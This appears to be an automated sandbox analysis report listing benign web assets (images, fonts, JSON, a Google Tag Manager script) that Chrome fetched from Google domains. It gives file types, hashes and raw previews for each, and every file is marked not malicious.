                                                                                                                                                                                                                                                            Preview:GIF89a........k9Z)....V)!.........H.".Z..*.....v).....1.df3!..o.B)..rbc..l1..B.......c5.{.H!...........G...).Y0v?#.o.R..U.R...r.R,...xJ../..%...{A...C....dW.C...0.jH....2..)...R).zy.H...0-$.....1.ui..#.X1..B.s9.*... .y"..)..F.Z...+...Q)....X1!.@..i..4........x..k..&..3.i...).UC.e....G(#.f.....K......R2.%..!..J)...h!....J(Y1.9!..d....k9....WHB5&.3......S(..7..!.O.R!..i"....6.K'.)......@..Y>......5".4$.b1..X.] .c:....J).k1.?..Y...4.W.....V...8.1...........J.x.....{..N.S...b..{.}...).......u!.{![4..6H".....Y....R!..xe.k0....G..B).....(.?0_)....L.....U6.4..K....|..?......J.b@7.?B...[ ......_ .........<..h.I1....uJ<............L).._0../.a<.......JG>5..).=......c9.I).....J.......;.. ..s:<.1....>=.......^\.....................!..NETSCAPE2.0.....!.......,...............H......*\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@...J...H.*]...P.J.J...X.j....`..K...h.]...p..K...x..........L.....+^....#K.L....3k.....
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Picasa], baseline, precision 8, 512x288, components 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):25658
                                                                                                                                                                                                                                                            Entropy (8bit):7.882789712129872
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:eYyzOyTaYZ9e8LPX3vqyKmQ+u2VFgSyPAz1b5t:eWyTa+9dLX3v/KmLYSyPAzZ7
                                                                                                                                                                                                                                                            MD5:A2BDE59FD465EA893A93B907CC0C9F3E
                                                                                                                                                                                                                                                            SHA1:1601CE90CDCE508325A31CE75DDEC4B12C1B841E
                                                                                                                                                                                                                                                            SHA-256:CC6C3D7DFCACF1F11407F2EE0106FE9964577091BEEFDC3AFF7636BD58D2B784
                                                                                                                                                                                                                                                            SHA-512:E2EEAADA02F75FE1D0B1C132B2A70D0F1CAAEB51B042FB3E77B8395D839FFE3AEF970C8020B1B9A6A4535A72F066348C05595289100C9122D348826E50AADC25
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://lh3.googleusercontent.com/iERG8EH9e9XNAoJGd1L4YhzMT0pLQmWs9wFRF2HU1-AOX7fgqQaVhKPr9SYCgWHFKw6nbLbToncl4pLOYqKuSDuVFsOBD8SebDFlTUGudVnQ_04QG6M
                                                                                                                                                                                                                                                            Preview:......JFIF.............*Exif..II*.......1...............Picasa.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Referen
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):6020
                                                                                                                                                                                                                                                            Entropy (8bit):5.935037352594483
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:96:+mjVeTeZ8DlSYKE2qKE3a/dgCCnIX0cG6H8:fVvTE2ql3a4N6c
                                                                                                                                                                                                                                                            MD5:67C66ECFC5021AE0CFBDF32BDEE91688
                                                                                                                                                                                                                                                            SHA1:2D7B977111E97DF855D96DAF2E5CA7F07EE8CC43
                                                                                                                                                                                                                                                            SHA-256:99294FAD3E114681D7504CAD26B5D425BF7BB98C82BB4ABCE603E145BA2E3E17
                                                                                                                                                                                                                                                            SHA-512:2E90F2F12F84859895A9A63A210F8E2626C22BA593918FC6E0B8452C003341CC06C0189B542F3A7AB74E1523AF3957B22DDE78CD3CF2B86DB7E37FC89B1D1E77
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" height="32" viewBox="0 0 32 32" width="32"><path d="M0 0h32v32H0z" fill="none"/><defs><path d="M28.95 6.98L16.6 7l-2.1-6H3.05C1.92 1 1 1.92 1 3.05v19.91C1 24.08 1.92 25 3.05 25h12.32l2 6h11.59c1.12 0 2.05-.92 2.05-2.05V9.02c-.01-1.12-.93-2.04-2.06-2.04z" id="a"/></defs><clipPath id="b"><use overflow="visible" xlink:href="#a"/></clipPath><g clip-path="url(#b)"><image height="34" opacity=".2" overflow="visible" transform="translate(5.909 3.909)" width="32" xlink:href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACEAAAAjCAYAAAAaLGNkAAAACXBIWXMAAAsSAAALEgHS3X78AAAA GXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAA4VJREFUeNrMWMtu21YQnZlL6mVb MWIbhbtqgxgJYCAb/0D+Jp8RZ5lfSX+hi/6Ad+kiqBYKEkRRFNuSrAdJ8c7kULJduZEsmXXZELh6 XF5yzsyZS50joh/g4MVzhrdXfL+hXtplOFsB4ljoOcnjj6cuin4V1T773cG/A9Mmcm7TarWHvvHg rdLJzx5xbB4MzwM4Otp37wfdCsfjDUdUCRwFZI6NPOcvdWqTkNISBTGPo7FIZdxs/jkh+k2vgPD1 2ufHbrc1qoZJ/aG4dB8zu6a6YWwhTucEIcZKaqS
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 21552, version 1.0
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):21552
                                                                                                                                                                                                                                                            Entropy (8bit):7.991124519925249
                                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                                            SSDEEP:384:sPsBjS050+6ZPTO5MZcvt18lQYjxHe+YeXIY3r9mgNRb4PBvCrdYq+sMM:sPMjX0Gj8lQYFFEY3JmgTbcqYo
                                                                                                                                                                                                                                                            MD5:EA2C3CF1BE388BD3FBE9D0CD8AFEE11C
                                                                                                                                                                                                                                                            SHA1:6647CBAF7BFEDD842F806549F5C3433A19EAB1AB
                                                                                                                                                                                                                                                            SHA-256:1CF04407E728EA1EBF82DC1C6B45D12632CB3202FF8F4556F380B16E57484F27
                                                                                                                                                                                                                                                            SHA-512:2B260F63CD6BD0C75A3E6EE9EB5FA5B477F1AB2E107F682165C8A4BDCB9A6CFBFD21AB172CE165A3C2EBF451AB91D27070EF5E4D985EF3105EBCAE964C6D8870
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://fonts.gstatic.com/s/googlesans/v16/4UaGrENHsxJlGDuGo1OIlL3Owp4.woff2
                                                                                                                                                                                                                                                            Preview:wOF2......T0.......d..S..............................,..@.`..~..<..u.....X........6.$.... ..r..X....|.5......0...av .....p.........R...srCd..._o.,...A.4...w...{0.. ..A[.z...L."..j..&s..a.-O]........m......~l..yy..m.&.X.U0........G.|..t....l\.HVN......o....4M.{.j..I.Kb.D.....7.....<0Ln._k.........d[&y.C...8..7w.,.L.....u.n.!..q..H..i.{.P.fq......D8....G).....m.;e.K,0...Z...<.......=#.}...]o._..t....<..Em.}..,P..........I...3..Q.G..g"..~nZ..P..Jb./..?q..}.=..v......N...f...,.!.3.V......s.?..g..X..5W...B.:.....H.Rq.Iw*A...rq,..;v.\"(.n.~K.Z.Q0>..P.....a%).y.LE.{.8..&...V..h.jJc....u.\.9K.MI...g\..M..~.....n.a(......j..J{ .E....Vv..^....8.2U.....{.%..A....48.oiIG...r9....hg@...QU.z[..8'd(.s...BB....a9a.t...fh...=.y...P....l._...?;......b.d.X..bf.p..m..$.... E.{...W..:.....8V.R."./."]3.M...G.....RB.!......>..Y.'..M.n.+.rC.2../u...U..#.........D..8...4..G.!Ad..".#.w..P.:-`.."DC..BBI)....]..$.}..q.<p..As...^.y.c...(:.......Q.D#1./..W......R...=.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 1000 x 422
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):472692
                                                                                                                                                                                                                                                            Entropy (8bit):7.937234407621061
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12288:+j3laK4TMWSNzVztevENA88AO5AJbeI/bw2Men:+rlZ4TCN6QeAOmJbt7
                                                                                                                                                                                                                                                            MD5:8364BE2EB65552EBEFCE77A1A9ED926F
                                                                                                                                                                                                                                                            SHA1:B7C4AC47DB7B824CA7ED05ED23F346A967E811A4
                                                                                                                                                                                                                                                            SHA-256:9F80AE587FE535115679A05F44783A74FF7608767209A4B3B5BF51063B709E66
                                                                                                                                                                                                                                                            SHA-512:A14BA632D6D79EC6411A849420FF4A6EEB9437B667450D7A9C8270692338F72354D4F16BEDECB88DFA04E83B00CAD123F4F901912527484712B674FC5680EFD9
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:GIF89a........k9Z)....V)!.........H.".Z..*.....v).....1.df3!..o.B)..rbc..l1..B.......c5.{.H!...........G...).Y0v?#.o.R..U.R...r.R,...xJ../..%...{A...C....dW.C...0.jH....2..)...R).zy.H...0-$.....1.ui..#.X1..B.s9.*... .y"..)..F.Z...+...Q)....X1!.@..i..4........x..k..&..3.i...).UC.e....G(#.f.....K......R2.%..!..J)...h!....J(Y1.9!..d....k9....WHB5&.3......S(..7..!.O.R!..i"....6.K'.)......@..Y>......5".4$.b1..X.] .c:....J).k1.?..Y...4.W.....V...8.1...........J.x.....{..N.S...b..{.}...).......u!.{![4..6H".....Y....R!..xe.k0....G..B).....(.?0_)....L.....U6.4..K....|..?......J.b@7.?B...[ ......_ .........<..h.I1....uJ<............L).._0../.a<.......JG>5..).=......c9.I).....J.......;.. ..s:<.1....>=.......^\.....................!..NETSCAPE2.0.....!.......,...............H......*\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@...J...H.*]...P.J.J...X.j....`..K...h.]...p..K...x..........L.....+^....#K.L....3k.....
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):1243
                                                                                                                                                                                                                                                            Entropy (8bit):7.764338808957871
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:fIFoo0SJzhxjOgoq5xzlffQBhNFbJ1zj60REG196qzFQG9yAWkZZ7:fIF+OhxjOsxzNfUhrbbm0nr6qzFXZ37
                                                                                                                                                                                                                                                            MD5:27E14AF9A504929C69C6A1B8A91A9177
                                                                                                                                                                                                                                                            SHA1:F57FEC734B6AAB9644D9DBDE2E1F33341E5A3FEC
                                                                                                                                                                                                                                                            SHA-256:4258CA4E92E2A88E6677FECA5369BFA95D370C66B665EF0C74CC9CCC7E864086
                                                                                                                                                                                                                                                            SHA-512:41E0AE9088E3410BF06F8056C4C42EFAE92C3B8AAFCD59FE821CD82C36EAC0F84C9ACB8C32822902CB9879571D664CE2D8E7BC0100287677C05794566A8FD871
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.gstatic.com/marketing-cms/24/76/63e52dda412e99a0d7edaeb9e00b/logo-translate-16x16.png
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR... ... .....szz.....IDATx...vcG.@..l.....d.afffF.03...1...'..'.S......%..>..{.....+..^.|8.h.|...?..#A..q......HG.Y...~Y>..B..e.=|....a....w~.L.B.......s...py....-{....p.... ...C.?..q{..?.xQN.u..%N.$...p....`tBgg7twwCWW..>...........n..<@...z A...=..d...w.H...}f....F&.^....Z9T.?...>...q.y........O.I.....waM.......@......I....n..;.c_w]...Ey..g.P.7..b....Q..@.........p.< Z....Uh....v..".|..$...`[..E...")..y.q..jjM`c....."..b_.I8B..{.S!....TX.\..Xv..+..`......p...8..QD.... .}...`.=I..r....*.N.x..lS...J...0...>..E.t2....,.....$...7.\........7.A9....j-$g.BVQ.d..Bnq.....'Qw.>...Ae.q...` ....C..q.....". y$c..|....yE`....tB....K..:.x...hwC...$_..Dg..+,^<.X...D.F.S7.`.6%.V..Y.=.{O]A..E.|...5... C....O..C.q..........bU]=P...cp....r"....s..._..w..A|..EW..... .B.1.A..gD.$<.+.foU....T_...*(.G466.u.w@D(TADy....>.c..`Va.,d'...#x........".P..~...aEe=..V.)..E{4..p..U....f!@!...P...). ..<LA.....:.7X.f.CNI...0=G.hhh..0C..^.aoY.R......E.a..I}.....
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):11794
                                                                                                                                                                                                                                                            Entropy (8bit):5.117865820187227
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:FDzh0mNFCsCM5FDpZY0Iz3w12aJuRqrKVVD:VzmmNwsCwpZY0Izg12ajG3
                                                                                                                                                                                                                                                            MD5:2FB9CE850E6257407EE80ADAF21A6DDF
                                                                                                                                                                                                                                                            SHA1:65F3BF72168F6F1F558D16EE9B1D641424699B50
                                                                                                                                                                                                                                                            SHA-256:5DB9134A577A232897992697700839E8F5BBFE6CC8BBA8065C78558759E3D3CA
                                                                                                                                                                                                                                                            SHA-512:3AA41F8861CD205B1F95011BCC13F81EA03E635A09D6D255A941E6294F0F493791A68288FE224A4F0E4278D1ADAEF33E7AFFA245E8ED87A02C2F0FE933DA527C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:"https://www.blog.google/api/v2/latest/?show_hero=true&tags=android,android-tv,calendar,chrome,chromebooks,chromecast,classroom,docs,drive,forms,gmail,google-ads,google-assistant,google-cloud,google-duo,google-earth,google-fi,google-fit,google-one,google-pay,google-play,google-shopping,google-voice,google-wifi,meet,keep,maps,messages,news,photos,pixel,pixelbook,search,sheets,sites,slides,stadia,translate,wear-os-by-google,youtube"
                                                                                                                                                                                                                                                            Preview:{"meta":{"total_count":3427},"next_page":"/api/v2/latest?paginate=12&tags=android%2Candroid-tv%2Ccalendar%2Cchrome%2Cchromebooks%2Cchromecast%2Cclassroom%2Cdocs%2Cdrive%2Cforms%2Cgmail%2Cgoogle-ads%2Cgoogle-assistant%2Cgoogle-cloud%2Cgoogle-duo%2Cgoogle-earth%2Cgoogle-fi%2Cgoogle-fit%2Cgoogle-one%2Cgoogle-pay%2Cgoogle-play%2Cgoogle-shopping%2Cgoogle-voice%2Cgoogle-wifi%2Cmeet%2Ckeep%2Cmaps%2Cmessages%2Cnews%2Cphotos%2Cpixel%2Cpixelbook%2Csearch%2Csheets%2Csites%2Cslides%2Cstadia%2Ctranslate%2Cwear-os-by-google%2Cyoutube&fields=&is_main_hero=False&show_hero=True&cursor=2","results":[{"published_readable_date":"Mar 20","category":"article","tag_name":"Pixel","hero":"https://storage.googleapis.com/gweb-uniblog-publish-prod/original_images/pixel_firefall_hero.gif","sitespace":"","main_hero_image":null,"url":"/products/pixel/4-pixel-photography-tips-yosemites-firefall/","full_url":"https://blog.google/products/pixel/4-pixel-photography-tips-yosemites-firefall/","tag":"pixel","page_id":61472
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):5430
                                                                                                                                                                                                                                                            Entropy (8bit):3.6534652184263736
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:wIJct3xIAxG/7nvWDtZcdYLtX7B6QXL3aqG8Q:wIJct+A47v+rcqlBPG9B
                                                                                                                                                                                                                                                            MD5:F3418A443E7D841097C714D69EC4BCB8
                                                                                                                                                                                                                                                            SHA1:49263695F6B0CDD72F45CF1B775E660FDC36C606
                                                                                                                                                                                                                                                            SHA-256:6DA5620880159634213E197FAFCA1DDE0272153BE3E4590818533FAB8D040770
                                                                                                                                                                                                                                                            SHA-512:82D017C4B7EC8E0C46E8B75DA0CA6A52FD8BCE7FCF4E556CBDF16B49FC81BE9953FE7E25A05F63ECD41C7272E8BB0A9FD9AEDF0AC06CB6032330B096B3702563
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:............ .h...&... .... .........(....... ..... ............................................0...................................................................................................................................v.].X.:.X.:.r.Y........................................q.X.S.4.S.4.S.4.S.4.S.4.S.4...X....................0........q.W.S.4.X.:.................J...A...g.........................K.H.V.8..........................F..B.....................,.......................................B..............................................B..B..B..B..B...u..........................................B..B..B..B..B...{.................5.......k...........................................................7R..8F.................................................2........Vb..5C..;I..................R^.....................0................Xc..5C..5C..5C..5C..5C..5C..lv..........................................]i..<J..:G..Zf....................................................
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 15848, version 1.0
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):15848
                                                                                                                                                                                                                                                            Entropy (8bit):7.987115559315355
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:HnVLO0y6NEttM2OtJriaVEdKKjTPpFQRbTw1kxPQtN:ZxyZt+2Ot8aedKKjrg3w1wuN
                                                                                                                                                                                                                                                            MD5:2FD81ED2FF28EA4548170C9338445580
                                                                                                                                                                                                                                                            SHA1:4B6D6517DB846C5A2F27075C98CD19D723F84786
                                                                                                                                                                                                                                                            SHA-256:D6BAF0FD48FCBFFD939463033CAFFA1B1B04E5FAED721F6F289581E02E8F0CCD
                                                                                                                                                                                                                                                            SHA-512:1FEBF5F9E4B044B3188579821ED584A17FF29A002C15E63C8D06194D4248912924A46DDF07F5304E97BBC827513C8B54474AAFB3790D80E6569E8C7C231DA226
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://fonts.gstatic.com/s/googlesans/v45/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPiYUvaYr.woff2
                                                                                                                                                                                                                                                            Preview:wOF2......=........x..=v..........................n..R...?HVAR.f.`?STAT..'...|/<.....T.0....0.:.6.$.... ..>. ...l...Vlw.P..q...6.@5..GE..lD..Ln......[,..B.95..r.jO..l.a.,a....B.._#.~T.....#..%../.I...H8...MwE^..p...o.S..........K.......N.H.h.?....".m.b.. ..x..%.....R..B.(..b.7J.....>;....FR..0.`@Wp...m..t.....)%p.Qe.D.H..3z........r....j..z{Q..C.U.*.$n....).,.$....@................l&.........]....*.Ze.A....B..~....g.^.p.._..-w.+.......;..&.!...Vo.UF..h......jh..k...7...Z..h.#.\d~[...o........Z./..L.>..7....].ZW..k..K#.......Rq..e.Z2a...v....;...n...w.L...=.....T...V....p}p...d.r......)......b.qA...%..L..,..5."....V(..*..O1.i..J..k...r...9.kmTgv.-..A..C*.e1.|....m........%..-.R..p...:.c....X.T...I...!.^!..n.R...,...."a.I........./.$xR.'..A..b...i<..C........q....!S8...o...j5j.....`T....'.:............0.9o.H...j......l.W*<.H....$..;.....C..I..U.g./(.*6....7{w;....n..a.L..e..e..xd....i.....=.........n..1.?.8..5.m..~...Y.Cs......yq......P....J...E............i
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2206)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):114626
                                                                                                                                                                                                                                                            Entropy (8bit):5.561793022176683
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:5PyRxSHiK0eieJgQZ8BdA06Tld01+FXltreTj7Ba3yL4w9YEnCEStUADTm:5PyRcCK0eJdTlC1uXltreTPBaO4qdMTm
                                                                                                                                                                                                                                                            MD5:AFCA4FF545F7A8E308B46481643E963D
                                                                                                                                                                                                                                                            SHA1:7748D60D8CFC89B5F95B401F66EBBF3E42A921A4
                                                                                                                                                                                                                                                            SHA-256:93BDAB6157FE787CCB888D6E447E6419462489A489BECA04EF43D4CBE9488E1D
                                                                                                                                                                                                                                                            SHA-512:9D931BDD3C513DABE57FE294EA83FA6C6C2F8F5B4FD46D1D8F06E2D9089EA3868488212D73C5352D75269BB5A170EE0D8B4444C063F4593AEA3405217A774DF9
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.googletagmanager.com/gtag/js?id=UA-175894890-5&l=dataLayer&cx=c
                                                                                                                                                                                                                                                            Preview:.// Copyright 2012 Google Inc. All rights reserved..(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__cid"}],. "tags":[{"function":"__rep","once_per_event":true,"vtp_containerId":["macro",1],"tag_id":1}],. "predicates":[{"function":"_eq","arg0":["macro",0],"arg1":"gtm.js"}],. "rules":[[["if",0],["add",0]]].},."runtime":[]......};.../*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var aa,ba=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},da="function"==typeof Object.create?Object.create:function(a){var b=function(){};b.prototype=a;return new b},ea;if("function"==typeof Object.setPrototypeOf)ea=Object.setPrototypeOf;else{var ha;a:{var ia={a:!0},ja={};try{ja.__proto__=ia;ha=ja.a;break a}catch(a){}ha=!1}ea=ha?function(a,b){a.__proto__=b;if(a.__proto__!==b)throw new TypeError(a+" is not extensible");return a}:null}.var ka=ea,la=function(a,b){a.prototype=d
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 512 x 288, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):90109
                                                                                                                                                                                                                                                            Entropy (8bit):7.981989065003746
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:ruFu7+4HH6qkOOLu8HcpIGXhOGpOXGEIsrSlwUbS85URF0me4fuUwpx0SHkv2QHP:i43dkBZGpOXlIsrSlwUbzKHANpuRbHKo
                                                                                                                                                                                                                                                            MD5:F2DE7B8ADD482C76E614BAF7F19C5099
                                                                                                                                                                                                                                                            SHA1:727303C189342F8225F202C50E1CA740D727CBA3
                                                                                                                                                                                                                                                            SHA-256:895F02B69BBCCB694F03D47A76619FD1E557A8AA82711EE77BDE07592F44D1BD
                                                                                                                                                                                                                                                            SHA-512:035764BCDDD88AB8FDD01AD4262145CC1099B204132DD0D475D81D57685B1019959D0C39552D3282D5D00A74E36403BE3D7E5C1B126EB97F2BB4DF364A5CBC28
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR....... ......<.Q....sBIT....|.d... .IDATx..K..8.&......qG..Gx%..J<.Ex...;.rw..... E)..s...['SI.M<>. ...._........Yk._..L.....<].'..D ..y>...$g...y....|..*..;D1..y.....F.*..Uj.sj..}..M..o3.m>Kc..z.O..z...3s..E8.`..c.3.J.v.x.wZ...:..wr;.H.b...a...~7^...D......K.^..?jv.M]Yr4u]....G.....Y..$".;iO.........U.._{^k.>...=O.]!.M..~....g..[J.0..}.%..x.....|/em.i.g...e........w./..._....Q.."...@../......6=+...<.?}n.F...=?=..r..#&>.~.^%.W..g...O...q..'b03.}g.>1..NW.M....G.... .N...].......7.L....x|g......&.$..u.......k....HsMU.Pz...&WT.......6.........i.`..*.NH...<B....A.9Ko1..q......*..........@.Z..%.<..........G.UEp...d.x.R.^Cx.z&....z.(<.>..PS?U...=..fn(Hf...#...k...k..~G.\......Q...1.S..1.I..O#j.....f.?f.>.ax.z..w....A.....1.<.^.....J.q.i?]C.....r.V..X...8.Qg`..N..zw....#.z.....1........D....?p..P.w......S.Q.?.!.....yN..I.8...N..+v.u.G.).f.A...|.L5.J4..v...o...A....(e.dR|.._o<...z..s.Qp......x{...NXI.[_;t....N....4*.I.m....==>~...2
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 1092 x 430
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):439916
                                                                                                                                                                                                                                                            Entropy (8bit):7.953491483405996
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12288:sf/I/u1A1NiuweiSI3B/n2+wEV50Ww3Yxks8X+jPilY1x:j1Ndwe6xf2kV50bo2sPjPiqf
                                                                                                                                                                                                                                                            MD5:30FB84CE2F2EDFC259940C30DBE9A4F7
                                                                                                                                                                                                                                                            SHA1:1202EAB0D2F04573594D7E3028C60C3FA21C0928
                                                                                                                                                                                                                                                            SHA-256:1DBF4816EDC29FE64A4E002452E25A5540C5B9940CFF7D614F22C784C1EB94E9
                                                                                                                                                                                                                                                            SHA-512:2031B2EEF73BE9BC47CB790DAE6A080085CB3D70734145D5A0E4F831A76A37601ABA2BD1982CEABE422C52CE120FE992D5A2AD05DDB08A3C6C482110652EA3F5
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:GIF89aD........5aC/..GfcH..k..|..F.{Y....31.b2.W..........SR;LJ6........R8.....5..j..R;9+...F-*skS.`..x....!....j.c;...v:.{8skJ..v..h.....N-.....v..h.F5..ssJ.....).x............V.{X.u.ql.xuhe......dUQ.i..G.d3...9...vK.d.CB1...m.<%19J..5..M..b....I-....Z.Y.."....sZHpZZ.Z.g..sI..vHJA..C....g.{(ksZ...yI.hPccZkkckkZa$.ZcZQ;6ksc..1sskckZ{{s.9W...^ZAckc.....ussRs{kssckkN{{k..z...{{Z{sR..ZZcR.....R.....JccR.&ssZ...{{R..Z..N~{cksk.....9...c..9{sZ..1s{s..B..OXZO.T..B.n{...|..P..0..R2.2]IEJRB..S...kcR))".0..J.hf.Cd11*.r....s{c......{scp4..Z:...{{{..Z...EZHcccZcJckRkcZ..){sl..R.{Jkkk.........]..Z..`..B.....Z..mR@..s....o......^.z5..qPRJ.k6..N.)&.k....xAsss.yv../..9..J..R..B..J......k......jF..."!.....1.....W..9s{Zja8kss.:.L*............!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="ht
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1200x800, components 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):123301
                                                                                                                                                                                                                                                            Entropy (8bit):7.9841684449994235
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:nVzIzD52Knf7lM67qEUsPSZ1jnbam3HAcy6z6iP:8/fpM6qsPSLB3AcDP
                                                                                                                                                                                                                                                            MD5:8AF3084617BED6C6DC5E61D37C41EFFF
                                                                                                                                                                                                                                                            SHA1:34BC14013B4076982ED1E77BF8E5627802793E92
                                                                                                                                                                                                                                                            SHA-256:34E4C75461D5AC35F526D61B690D284A7B925D891D90112D45DC3FA5C8C26B44
                                                                                                                                                                                                                                                            SHA-512:78005C9041793903055F593E91612C7824FB10944F2CD7D55ECE52F2BB92DDD0D57D8C9AE4C48D63FC9E5B3C46C74BEC42DF3B45DADE2B4F94BE4596ECD22BBC
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
